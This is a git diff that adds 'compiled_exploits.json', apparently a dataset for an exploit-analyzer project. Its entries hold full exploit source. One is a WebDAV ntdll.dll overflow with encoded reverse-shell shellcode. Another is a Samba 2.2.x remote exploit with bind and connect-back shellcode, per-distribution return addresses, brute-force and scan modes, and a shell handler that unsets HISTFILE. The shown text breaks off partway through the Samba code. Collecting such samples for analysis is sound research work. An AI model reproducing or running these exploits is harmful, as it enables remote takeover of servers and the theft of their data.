diff --git a/.gitattributes b/.gitattributes index a6344aac8c09253b3b630fb776ae94478aa0275b..866ce68025f990030736d0b4aff4c8aa4ff64e51 100644 --- a/.gitattributes +++ b/.gitattributes @@ -33,3 +33,4 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text *.zip filter=lfs diff=lfs merge=lfs -text *.zst filter=lfs diff=lfs merge=lfs -text *tfevents* filter=lfs diff=lfs merge=lfs -text +code_analysis_dataset.csv filter=lfs diff=lfs merge=lfs -text diff --git a/code_analysis_dataset.csv b/code_analysis_dataset.csv new file mode 100644 index 0000000000000000000000000000000000000000..f92ca24af2cbf2646bcb792c724b714fed4a008a --- /dev/null +++ b/code_analysis_dataset.csv @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9fb83acd5511b7c7d8d9788388c55f2379da13e0921796787695922f2ef4f6d +size 11946655 diff --git a/exploit-analyzer/compiled_exploits.json b/exploit-analyzer/compiled_exploits.json new file mode 100644 index 0000000000000000000000000000000000000000..067efa75f4bc58bda1d967b0af107cda03699488 --- /dev/null +++ b/exploit-analyzer/compiled_exploits.json @@ -0,0 +1,5342 @@ +[ + { + "exploit_id": 1, + "content": "/*******************************************************************/\n\n/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */\n\n/* --------------------------------------------------------------- */\n\n/* this is the exploit for ntdll.dll through WebDAV. */\n\n/* run a netcat ex: nc -L -vv -p 666 */\n\n/* wb server.com your_ip 666 0 */\n\n/* the shellcode is a reverse remote shell */\n\n/* you need to pad a bit.. the best way I think is launching */\n\n/* the exploit with pad = 0 and after that, the server will be */\n\n/* down for a couple of seconds, now retry with pad at 1 */\n\n/* and so on..pad 2.. pad 3.. if you haven't the shell after */\n\n/* something like pad at 10 I think you better to restart from */\n\n/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */\n\n/* on all the others servers it was at 2,3,4, etc..sometimes */\n\n/* you can have the force with you, and get the shell in 1 try */\n\n/* sometimes you need to pad more than 10 times ;) */\n\n/* the shellcode was coded by myself, it is SEH + ScanMem to */\n\n/* find the famous offsets (GetProcAddress).. */\n\n/* */\n\n/*******************************************************************/\n\n\n\n\n\n#include \n\n#include \n\n#include \n\n\n\n#pragma comment (lib,\"ws2_32\")\n\n\n\nchar shellc0de[] =\n\n\"\\x55\\x8b\\xec\\x33\\xc9\\x53\\x56\\x57\\x8d\\x7d\\xa2\\xb1\\x25\\xb8\\xcc\\xcc\"\n\n\"\\xcc\\xcc\\xf3\\xab\\xeb\\x09\\xeb\\x0c\\x58\\x5b\\x59\\x5a\\x5c\\x5d\\xc3\\xe8\"\n\n\"\\xf2\\xff\\xff\\xff\\x5b\\x80\\xc3\\x10\\x33\\xc9\\x66\\xb9\\xb5\\x01\\x80\\x33\"\n\n\"\\x95\\x43\\xe2\\xfa\\x66\\x83\\xeb\\x67\\xfc\\x8b\\xcb\\x8b\\xf3\\x66\\x83\\xc6\"\n\n\"\\x46\\xad\\x56\\x40\\x74\\x16\\x55\\xe8\\x13\\x00\\x00\\x00\\x8b\\x64\\x24\\x08\"\n\n\"\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x58\\x5d\\x5e\\xeb\\xe5\\x58\\xeb\\xb9\\x64\"\n\n\"\\xff\\x35\\x00\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x48\\x66\\x81\"\n\n\"\\x38\\x4d\\x5a\\x75\\xdb\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x5d\\x5e\\x8b\\xe8\"\n\n\"\\x03\\x40\\x3c\\x8b\\x78\\x78\\x03\\xfd\\x8b\\x77\\x20\\x03\\xf5\\x33\\xd2\\x8b\"\n\n\"\\x06\\x03\\xc5\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\x25\\x81\\x78\\x04\\x72\\x6f\"\n\n\"\\x63\\x41\\x75\\x1c\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\x13\\x8b\\x47\\x24\"\n\n\"\\x03\\xc5\\x0f\\xb7\\x1c\\x50\\x8b\\x47\\x1c\\x03\\xc5\\x8b\\x1c\\x98\\x03\\xdd\"\n\n\"\\x83\\xc6\\x04\\x42\\x3b\\x57\\x18\\x75\\xc6\\x8b\\xf1\\x56\\x55\\xff\\xd3\\x83\"\n\n\"\\xc6\\x0f\\x89\\x44\\x24\\x20\\x56\\x55\\xff\\xd3\\x8b\\xec\\x81\\xec\\x94\\x00\"\n\n\"\\x00\\x00\\x83\\xc6\\x0d\\x56\\xff\\xd0\\x89\\x85\\x7c\\xff\\xff\\xff\\x89\\x9d\"\n\n\"\\x78\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x33\\xc9\\x51\\x51\\x51\"\n\n\"\\x51\\x41\\x51\\x41\\x51\\xff\\xd0\\x89\\x85\\x94\\x00\\x00\\x00\\x8b\\x85\\x7c\"\n\n\"\\xff\\xff\\xff\\x83\\xc6\\x0b\\x56\\x50\\xff\\xd3\\x83\\xc6\\x08\\x6a\\x10\\x56\"\n\n\"\\x8b\\x8d\\x94\\x00\\x00\\x00\\x51\\xff\\xd0\\x33\\xdb\\xc7\\x45\\x8c\\x44\\x00\"\n\n\"\\x00\\x00\\x89\\x5d\\x90\\x89\\x5d\\x94\\x89\\x5d\\x98\\x89\\x5d\\x9c\\x89\\x5d\"\n\n\"\\xa0\\x89\\x5d\\xa4\\x89\\x5d\\xa8\\xc7\\x45\\xb8\\x01\\x01\\x00\\x00\\x89\\x5d\"\n\n\"\\xbc\\x89\\x5d\\xc0\\x8b\\x9d\\x94\\x00\\x00\\x00\\x89\\x5d\\xc4\\x89\\x5d\\xc8\"\n\n\"\\x89\\x5d\\xcc\\x8d\\x45\\xd0\\x50\\x8d\\x4d\\x8c\\x51\\x6a\\x00\\x6a\\x00\\x6a\"\n\n\"\\x00\\x6a\\x01\\x6a\\x00\\x6a\\x00\\x83\\xc6\\x09\\x56\\x6a\\x00\\x8b\\x45\\x20\"\n\n\"\\xff\\xd0\"\n\n\"CreateProcessA\\x00LoadLibraryA\\x00ws2_32.dll\\x00WSASocketA\\x00\"\n\n\"connect\\x00\\x02\\x00\\x02\\x9A\\xC0\\xA8\\x01\\x01\\x00\"\n\n\"cmd\" // don't change anything..\n\n\"\\x00\\x00\\xe7\\x77\" // offsets of kernel32.dll for some win ver..\n\n\"\\x00\\x00\\xe8\\x77\"\n\n\"\\x00\\x00\\xf0\\x77\"\n\n\"\\x00\\x00\\xe4\\x77\"\n\n\"\\x00\\x88\\x3e\\x04\" // win2k3\n\n\"\\x00\\x00\\xf7\\xbf\" // win9x =P\n\n\"\\xff\\xff\\xff\\xff\";\n\n\n\nint test_host(char *host)\n\n{\n\nchar search[100]=\"\";\n\nint sock;\n\nstruct hostent *heh;\n\nstruct sockaddr_in hmm;\n\nchar buf[100] =\"\";\n\n\n\nif(strlen(host)>60) {\n\nprintf(\"error: victim host too long.\\r\\n\");\n\nreturn 1;\n\n}\n\n\n\nif ((heh = gethostbyname(host))==0){\n\nprintf(\"error: can't resolve '%s'\",host);\n\nreturn 1;\n\n}\n\n\n\nsprintf(search,\"SEARCH / HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n\",host);\n\nhmm.sin_port = htons(80);\n\nhmm.sin_family = AF_INET;\n\nhmm.sin_addr = *((struct in_addr *)heh->h_addr);\n\n\n\nif ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\nprintf(\"error: can't create socket\");\n\nreturn 1;\n\n}\n\n\n\nprintf(\"Checking WebDav on '%s' ... \",host);\n\n\n\nif ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){\n\nprintf(\"CONNECTING_ERROR\\r\\n\");\n\nreturn 1;\n\n}\n\nsend(sock,search,strlen(search),0);\n\nrecv(sock,buf,sizeof(buf),0);\n\nif(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')\n\nreturn 0;\n\nprintf(\"NOT FOUND\\r\\n\");\n\nreturn 1;\n\n}\n\n\n\nvoid help(char *program)\n\n{\n\nprintf(\"syntax: %s [padding]\\r\\n\",program);\n\nreturn;\n\n}\n\n\n\nvoid banner(void)\n\n{\n\nprintf(\"\\r\\n\\t [Crpt] ntdll.dll exploit trough WebDAV by kralor\n\n[Crpt]\\r\\n\");\n\nprintf(\"\\t\\twww.coromputer.net && undernet #coromputer\\r\\n\\r\\n\");\n\nreturn;\n\n}\n\n\n\nvoid main(int argc, char *argv[])\n\n{\n\nWSADATA wsaData;\n\nunsigned short port=0;\n\nchar *port_to_shell=\"\", *ip1=\"\", data[50]=\"\";\n\nunsigned int i,j;\n\nunsigned int ip = 0 ;\n\nint s, PAD=0x10;\n\nstruct hostent *he;\n\nstruct sockaddr_in crpt;\n\nchar buffer[65536] =\"\";\n\nchar request[80000]; // huuuh, what a mess! :)\n\nchar content[] =\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\"\n\n\"Select \\\"DAV:displayname\\\" from scope()\\r\\n\"\n\n\"\\r\\n\"\n\n\"\\r\\n\";\n\n\n\nbanner();\n\nif((argc<4)||(argc>5)) {\n\nhelp(argv[0]);\n\nreturn;\n\n}\n\n\n\nif(WSAStartup(0x0101,&wsaData)!=0) {\n\nprintf(\"error starting winsock..\");\n\nreturn;\n\n}\n\n\n\nif(test_host(argv[1]))\n\nreturn;\n\n\n\nif(argc==5)\n\nPAD+=atoi(argv[4]);\n\n\n\nprintf(\"FOUND\\r\\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\\r\\n\",PAD,PAD);\n\n\n\nip = inet_addr(argv[2]); ip1 = (char*)&ip;\n\n\n\nshellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];\n\nshellc0de[451]=ip1[3];\n\n\n\nport = htons(atoi(argv[3]));\n\nport_to_shell = (char *) &port;\n\nshellc0de[446]=port_to_shell[0];\n\nshellc0de[447]=port_to_shell[1];\n\n\n\n// we xor the shellcode [xored by 0x95 to avoid bad chars]\n\n__asm {\n\nlea eax, shellc0de\n\nadd eax, 0x34\n\nxor ecx, ecx\n\nmov cx, 0x1b0\n\nwah:\n\nxor byte ptr[eax], 0x95\n\ninc eax\n\nloop wah\n\n}\n\n\n\nif ((he = gethostbyname(argv[1]))==0){\n\nprintf(\"error: can't resolve '%s'\",argv[1]);\n\nreturn;\n\n}\n\n\n\ncrpt.sin_port = htons(80);\n\ncrpt.sin_family = AF_INET;\n\ncrpt.sin_addr = *((struct in_addr *)he->h_addr);\n\n\n\nif ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){\n\nprintf(\"error: can't create socket\");\n\nreturn;\n\n}\n\n\n\nprintf(\"Connecting... \");\n\n\n\nif ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){\n\nprintf(\"ERROR\\r\\n\");\n\nreturn;\n\n}\n\n// No Operation.\n\nfor(i=0;i\n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n#include \n\n\n\ntypedef struct {\n\n unsigned char type;\n\n unsigned char flags;\n\n unsigned short length;\n\n} NETBIOS_HEADER;\n\n\n\ntypedef struct {\n\n unsigned char protocol[4];\n\n unsigned char command;\n\n unsigned short status;\n\n unsigned char reserved;\n\n unsigned char flags;\n\n unsigned short flags2;\n\n unsigned char pad[12];\n\n unsigned short tid;\n\n unsigned short pid;\n\n unsigned short uid;\n\n unsigned short mid;\n\n} SMB_HEADER;\n\n\n\nint OWNED = 0;\n\npid_t childs[100];\n\nstruct sockaddr_in addr1;\n\nstruct sockaddr_in addr2;\n\n\n\nchar linux_bindcode[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\"\n\n \"\\x50\\x66\\x68\\xb0\\xef\\xb3\\x02\\x66\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\"\n\n \"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\"\n\n \"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\"\n\n \"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\"\n\n \"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\"\n\n \"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\"\n\n \"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\"\n\n \"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"\n\n \"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\"\n\n \"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\"\n\n \"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\";\n\n\n\nchar bsd_bindcode[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\"\n\n \"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\"\n\n \"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\"\n\n \"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\"\n\n \"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\"\n\n \"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\"\n\n \"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\"\n\n \"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\"\n\n \"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\"\n\n \"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\"\n\n \"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\"\n\n \"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\"\n\n \"\\xeb\\x9a\";\n\n\n\nchar linux_connect_back[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\n\n \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"\n\n \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"\n\n \"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"\n\n \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"\n\n \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"\n\n \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"\n\n \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"\n\n \"\\x01\\xcd\\x80\"; \n\n\n\nchar bsd_connect_back[] =\n\n \"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\"\n\n \"\\x61\\xcd\\x80\\x31\\xd2\\x52\\x52\\x68\\x41\\x41\\x41\\x41\\x66\\x68\\xb0\\xef\"\n\n \"\\xb7\\x02\\x66\\x53\\x89\\xe1\\xb2\\x10\\x52\\x51\\x50\\x52\\x89\\xc2\\x31\\xc0\"\n\n \"\\xb0\\x62\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\n\n \"\\x31\\xc0\\x50\\x52\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x52\"\n\n \"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x43\\x53\\x52\\x50\\xb0\\x5a\\xcd\\x80\\x31\"\n\n \"\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\"\n\n \"\\x53\\x50\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\n\n\n\n\n\n\n\nstruct {\n\n char *type;\n\n unsigned long ret;\n\n char *shellcode;\n\n int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */\n\n\n\n} targets[] = {\n\n { \"samba-2.2.x - Debian 3.0 \", 0xbffffea2, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Gentoo 1.4.x \", 0xbfffe890, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Mandrake 8.x \", 0xbffff6a0, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Mandrake 9.0 \", 0xbfffe638, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 9.0 \", 0xbffff7cc, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 8.0 \", 0xbffff2f0, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 7.x \", 0xbffff310, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Redhat 6.x \", 0xbffff2f0, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Slackware 9.0 \", 0xbffff574, linux_bindcode, 0 },\n\n { \"samba-2.2.x - Slackware 8.x \", 0xbffff574, linux_bindcode, 0 },\n\n { \"samba-2.2.x - SuSE 7.x \", 0xbffffbe6, linux_bindcode, 0 }, \n\n { \"samba-2.2.x - SuSE 8.x \", 0xbffff8f8, linux_bindcode, 0 },\n\n { \"samba-2.2.x - FreeBSD 5.0 \", 0xbfbff374, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - FreeBSD 4.x \", 0xbfbff374, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - NetBSD 1.6 \", 0xbfbfd5d0, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - NetBSD 1.5 \", 0xbfbfd520, bsd_bindcode, 1 },\n\n { \"samba-2.2.x - OpenBSD 3.2 \", 0x00159198, bsd_bindcode, 2 },\n\n { \"samba-2.2.8 - OpenBSD 3.2 (package)\", 0x001dd258, bsd_bindcode, 2 },\n\n { \"samba-2.2.7 - OpenBSD 3.2 (package)\", 0x001d9230, bsd_bindcode, 2 },\n\n { \"samba-2.2.5 - OpenBSD 3.2 (package)\", 0x001d6170, bsd_bindcode, 2 },\n\n { \"Crash (All platforms) \", 0xbade5dee, linux_bindcode, 0 },\n\n};\n\n\n\nvoid shell();\n\nvoid usage();\n\nvoid handler();\n\n\n\nint is_samba(char *ip, unsigned long time_out);\n\nint Connect(int fd, char *ip, unsigned int port, unsigned int time_out);\n\nint read_timer(int fd, unsigned int time_out);\n\nint write_timer(int fd, unsigned int time_out);\n\nint start_session(int sock);\n\nint exploit_normal(int sock, unsigned long ret, char *shellcode);\n\nint exploit_openbsd32(int sock, unsigned long ret, char *shellcode);\n\n\n\nvoid usage(char *prog)\n\n{\n\n fprintf(stderr, \"Usage: %s [-bBcCdfprsStv] [host]\\n\\n\"\n\n \"-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\\n\"\n\n \"-B bruteforce steps (default = 300)\\n\"\n\n \"-c connectback ip address\\n\"\n\n \"-C max childs for scan/bruteforce mode (default = 40)\\n\"\n\n \"-d bruteforce/scanmode delay in micro seconds (default = 100000)\\n\"\n\n \"-f force\\n\" \n\n \"-p port to attack (default = 139)\\n\"\n\n \"-r return address\\n\"\n\n \"-s scan mode (random)\\n\"\n\n \"-S scan mode\\n\"\n\n \"-t presets (0 for a list)\\n\" \n\n \"-v verbose mode\\n\\n\", prog);\n\n \n\n exit(1);\n\n}\n\n\n\nint is_samba(char *ip, unsigned long time_out)\n\n{\n\n char\n\n nbtname[]= /* netbios name packet */\n\n {\n\n 0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,\n\n 0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,\n\n 0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,\n\n 0x00,0x01\n\n };\n\n\n\n unsigned char recv_buf[1024];\n\n unsigned char *ptr;\n\n\n\n int i = 0;\n\n int s = 0;\n\n\n\n unsigned int total = 0;\n\n\n\n if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;\n\n\n\n if(Connect(s, ip, 137, time_out) == -1) {\n\n close(s);\n\n return -1;\n\n } \n\n\n\n memset(recv_buf, 0x00, sizeof(recv_buf));\n\n\n\n if(write_timer(s, time_out) == 1) {\n\n if (write(s, nbtname, sizeof(nbtname)) <= 0) {\n\n close(s);\n\n return -1;\n\n }\n\n }\n\n\n\n if (read_timer(s, time_out) == 1) {\n\n if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {\n\n close(s);\n\n return -1;\n\n }\n\n\n\n ptr = recv_buf + 57;\n\n total = *(ptr - 1); /* max names */\n\n\n\n while(ptr < recv_buf + sizeof(recv_buf)) {\n\n ptr += 18;\n\n if (i == total) {\n\n\n\n ptr -= 19; \n\n\n\n if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&\n\n *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {\n\n close(s);\n\n return 0;\n\n }\n\n\n\n close(s);\n\n return 1;\n\n }\n\n\n\n i++; \n\n }\n\n\n\n }\n\n close(s);\n\n return -1;\n\n}\n\n\n\nint Connect(int fd, char *ip, unsigned int port, unsigned int time_out) \n\n{\n\n /* ripped from no1 */\n\n\n\n int flags;\n\n int select_status;\n\n fd_set connect_read, connect_write;\n\n struct timeval timeout;\n\n int getsockopt_length = 0;\n\n int getsockopt_error = 0;\n\n struct sockaddr_in server;\n\n bzero(&server, sizeof(server));\n\n server.sin_family = AF_INET;\n\n inet_pton(AF_INET, ip, &server.sin_addr);\n\n server.sin_port = htons(port);\n\n\n\n if((flags = fcntl(fd, F_GETFL, 0)) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n timeout.tv_sec = time_out;\n\n timeout.tv_usec = 0;\n\n FD_ZERO(&connect_read);\n\n FD_ZERO(&connect_write);\n\n FD_SET(fd, &connect_read);\n\n FD_SET(fd, &connect_write);\n\n\n\n if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {\n\n if(errno != EINPROGRESS) {\n\n close(fd);\n\n return -1;\n\n }\n\n }\n\n else {\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n return 1;\n\n\n\n }\n\n\n\n select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);\n\n\n\n if(select_status == 0) {\n\n close(fd);\n\n return -1;\n\n\n\n }\n\n\n\n if(select_status == -1) {\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {\n\n if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))\n\n {\n\n getsockopt_length = sizeof(getsockopt_error);\n\n\n\n if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {\n\n errno = ETIMEDOUT;\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(getsockopt_error == 0) {\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n return 1;\n\n } \n\n\n\n else {\n\n errno = getsockopt_error;\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n }\n\n }\n\n else {\n\n close(fd);\n\n return 1;\n\n }\n\n\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n return 1;\n\n}\n\n\n\nint read_timer(int fd, unsigned int time_out)\n\n{\n\n\n\n /* ripped from no1 */\n\n\n\n int flags;\n\n int select_status;\n\n fd_set fdread;\n\n struct timeval timeout;\n\n\n\n if((flags = fcntl(fd, F_GETFL, 0)) < 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n timeout.tv_sec = time_out;\n\n timeout.tv_usec = 0;\n\n FD_ZERO(&fdread);\n\n FD_SET(fd, &fdread);\n\n select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);\n\n\n\n if(select_status == 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n if(select_status == -1) {\n\n close(fd);\n\n return (-1);\n\n }\n\n \n\n if(FD_ISSET(fd, &fdread)) {\n\n \n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n \n\n return 1;\n\n\n\n } \n\n else {\n\n close(fd);\n\n return 1;\n\n\n\n }\n\n}\n\n\n\nint write_timer(int fd, unsigned int time_out)\n\n{\n\n\n\n /* ripped from no1 */\n\n\n\n int flags;\n\n int select_status;\n\n fd_set fdwrite;\n\n struct timeval timeout;\n\n\n\n if((flags = fcntl(fd, F_GETFL, 0)) < 0) { \n\n close(fd);\n\n return (-1);\n\n }\n\n\n\n if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {\n\n close(fd);\n\n return (-1);\n\n }\n\n \n\n timeout.tv_sec = time_out;\n\n timeout.tv_usec = 0;\n\n FD_ZERO(&fdwrite);\n\n FD_SET(fd, &fdwrite);\n\n\n\n select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);\n\n\n\n if(select_status == 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(select_status == -1) {\n\n close(fd);\n\n return -1;\n\n }\n\n\n\n if(FD_ISSET(fd, &fdwrite)) {\n\n if(fcntl(fd, F_SETFL, flags) < 0) {\n\n close(fd);\n\n return -1;\n\n }\n\n return 1;\n\n }\n\n else { \n\n close(fd);\n\n return -1;\n\n }\n\n}\n\n\n\n\n\nvoid shell(int sock)\n\n{\n\n fd_set fd_read;\n\n char buff[1024], *cmd=\"unset HISTFILE; echo \\\"*** JE MOET JE MUIL HOUWE\\\";uname -a;id;\\n\";\n\n int n;\n\n\n\n FD_ZERO(&fd_read);\n\n FD_SET(sock, &fd_read);\n\n FD_SET(0, &fd_read);\n\n\n\n send(sock, cmd, strlen(cmd), 0);\n\n\n\n while(1) {\n\n FD_SET(sock,&fd_read);\n\n FD_SET(0,&fd_read);\n\n\n\n if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;\n\n\n\n if (FD_ISSET(sock, &fd_read)) {\n\n\n\n if((n = recv(sock, buff, sizeof(buff), 0)) < 0){\n\n fprintf(stderr, \"EOF\\n\");\n\n exit(2);\n\n }\n\n\n\n if (write(1, buff, n) < 0) break;\n\n }\n\n\n\n if (FD_ISSET(0, &fd_read)) {\n\n\n\n if((n = read(0, buff, sizeof(buff))) < 0){\n\n fprintf(stderr, \"EOF\\n\");\n\n exit(2);\n\n }\n\n\n\n if (send(sock, buff, n, 0) < 0) break;\n\n }\n\n\n\n usleep(10);\n\n }\n\n\n\n fprintf(stderr, \"Connection lost.\\n\\n\");\n\n exit(0);\n\n}\n\n\n\nvoid handler()\n\n{\n\n int sock = 0;\n\n int i = 0;\n\n OWNED = 